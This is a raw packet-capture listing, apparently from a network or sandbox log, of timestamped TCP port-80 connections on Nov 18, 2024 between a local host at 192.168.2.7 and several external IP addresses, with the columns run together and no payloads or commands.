                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.099504948 CET805016172.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.757237911 CET805016172.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.757415056 CET5016180192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.757702112 CET5016180192.168.2.772.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.762501001 CET805016172.52.178.23192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.783356905 CET5016280192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.788346052 CET805016244.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.788697004 CET5016280192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.789097071 CET5016280192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.789097071 CET5016280192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.794258118 CET805016244.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:14.794302940 CET805016244.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.097409010 CET805016047.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.097778082 CET5016080192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.103399038 CET805016047.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.103514910 CET5016080192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.113430977 CET5016380192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.118458986 CET805016313.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.118551016 CET5016380192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.118834972 CET5016380192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.118834972 CET5016380192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.123683929 CET805016313.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.123800993 CET805016313.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.464734077 CET805016244.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.465591908 CET5016280192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.470870972 CET805016244.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.470964909 CET5016280192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.477910042 CET5016480192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.482975006 CET805016418.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.483172894 CET5016480192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.483172894 CET5016480192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.483365059 CET5016480192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.488101959 CET805016418.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.488220930 CET805016418.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.725380898 CET5016380192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.728336096 CET5016580192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.733288050 CET805016513.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.733588934 CET5016580192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.733588934 CET5016580192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.733589888 CET5016580192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.738535881 CET805016513.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:15.738614082 CET805016513.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.933494091 CET805016418.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.933651924 CET5016480192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.939766884 CET805016418.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.940113068 CET5016480192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.947304964 CET5016680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.952600002 CET805016618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.952847958 CET5016680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.952847958 CET5016680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.952936888 CET5016680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.957837105 CET805016618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:16.958409071 CET805016618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.168714046 CET805016513.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.168888092 CET5016580192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.174268961 CET805016513.251.16.150192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.174362898 CET5016580192.168.2.713.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.187284946 CET5016780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.192179918 CET805016718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.192301989 CET5016780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.193176031 CET5016780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.193176031 CET5016780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.198107958 CET805016718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.198117018 CET805016718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.830013990 CET805016618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.830126047 CET805016618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.830147028 CET805016618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.830199957 CET5016680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:17.857098103 CET5016680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.110373974 CET805016718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.110405922 CET805016618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.110418081 CET805016718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.110430002 CET805016718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.110464096 CET5016680192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.110493898 CET5016780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.110515118 CET5016780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.111291885 CET805016618.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.125415087 CET5016780192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.130434990 CET805016718.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.152793884 CET5016880192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.159018993 CET8050168172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.159096003 CET5016880192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.160255909 CET5016880192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.160268068 CET5016880192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.164463997 CET5016980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.165142059 CET8050168172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.165215969 CET8050168172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.170109034 CET805016944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.172005892 CET5016980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.172183990 CET5016980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.172240973 CET5016980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.177174091 CET805016944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.177330971 CET805016944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.819761038 CET8050168172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.819816113 CET5016880192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.829613924 CET805016944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.831954002 CET5016880192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.836925030 CET8050168172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.838500977 CET5016980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.843888044 CET805016944.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.843961954 CET5016980192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.889678001 CET5017080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.894782066 CET8050170172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.894860983 CET5017080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.909547091 CET5017080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.909573078 CET5017080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.914463043 CET8050170172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.914519072 CET8050170172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.936183929 CET5017180192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.941565990 CET805017118.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.941632032 CET5017180192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.950936079 CET5017180192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.950958014 CET5017180192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.955914021 CET805017118.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:18.955928087 CET805017118.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.557729006 CET8050170172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.559845924 CET5017080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.583580971 CET5017080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.588480949 CET8050170172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.595128059 CET5017280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.600089073 CET805017254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.601650953 CET5017280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.601705074 CET5017280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.601810932 CET5017280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.606702089 CET805017254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.607250929 CET805017254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.608052015 CET805017118.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.608308077 CET5017180192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.613493919 CET805017118.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.614022970 CET5017180192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.629841089 CET5017380192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.634779930 CET805017347.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.635719061 CET5017380192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.635849953 CET5017380192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.635911942 CET5017380192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.640750885 CET805017347.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.640775919 CET805017347.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.724055052 CET5017380192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.725338936 CET5017480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.730360985 CET805017447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.730443001 CET5017480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.730597973 CET5017480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.730618000 CET5017480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.735531092 CET805017447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:19.735573053 CET805017447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.440609932 CET805017254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.444477081 CET5017280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.449981928 CET805017254.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.450050116 CET5017280192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.466445923 CET5017580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.471466064 CET805017544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.471544027 CET5017580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.477060080 CET5017580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.477277040 CET5017580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.481838942 CET805017544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:20.482060909 CET805017544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.134002924 CET805017544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.135427952 CET5017580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.140816927 CET805017544.221.84.105192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.141661882 CET5017580192.168.2.744.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.154753923 CET5017680192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.159868956 CET805017634.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.160412073 CET5017680192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.160959959 CET5017680192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.165190935 CET5017680192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.166313887 CET805017634.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.170978069 CET805017634.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.209387064 CET805017447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.214387894 CET5017480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.222239971 CET805017447.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:21.225184917 CET5017480192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.007004976 CET805017634.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.010329962 CET5017680192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.019579887 CET805017634.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.019634008 CET5017680192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.039355040 CET5017780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.047558069 CET805017734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.047626019 CET5017780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.047966957 CET5017780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.047981977 CET5017780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.052978039 CET805017734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.052995920 CET805017734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.161540031 CET5017880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.166532993 CET805017818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.166682959 CET5017880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.166762114 CET5017880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.166762114 CET5017880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.172293901 CET805017818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.172821999 CET805017818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.837994099 CET805017818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.838217974 CET5017880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.843636990 CET805017818.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.843826056 CET5017880192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.852935076 CET5017980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.858167887 CET805017954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.858253956 CET5017980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.858365059 CET5017980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.858382940 CET5017980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.863378048 CET805017954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.863435984 CET805017954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.881922960 CET805017734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.882117987 CET5017780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.887274027 CET805017734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.887351036 CET5017780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.893702984 CET5018080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.898834944 CET805018034.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.898919106 CET5018080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.899009943 CET5018080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.899025917 CET5018080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.904099941 CET805018034.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:22.904112101 CET805018034.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.690598011 CET805017954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.691224098 CET5017980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.696964025 CET805017954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.697154999 CET5017980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.707961082 CET5018180192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.712980032 CET805018118.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.713323116 CET5018180192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.713323116 CET5018180192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.713471889 CET5018180192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.718301058 CET805018118.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.718314886 CET805018118.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.892092943 CET805018034.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.892241001 CET5018080192.168.2.734.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.897819042 CET805018034.246.200.160192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:23.897878885 CET5018080192.168.2.734.246.200.160
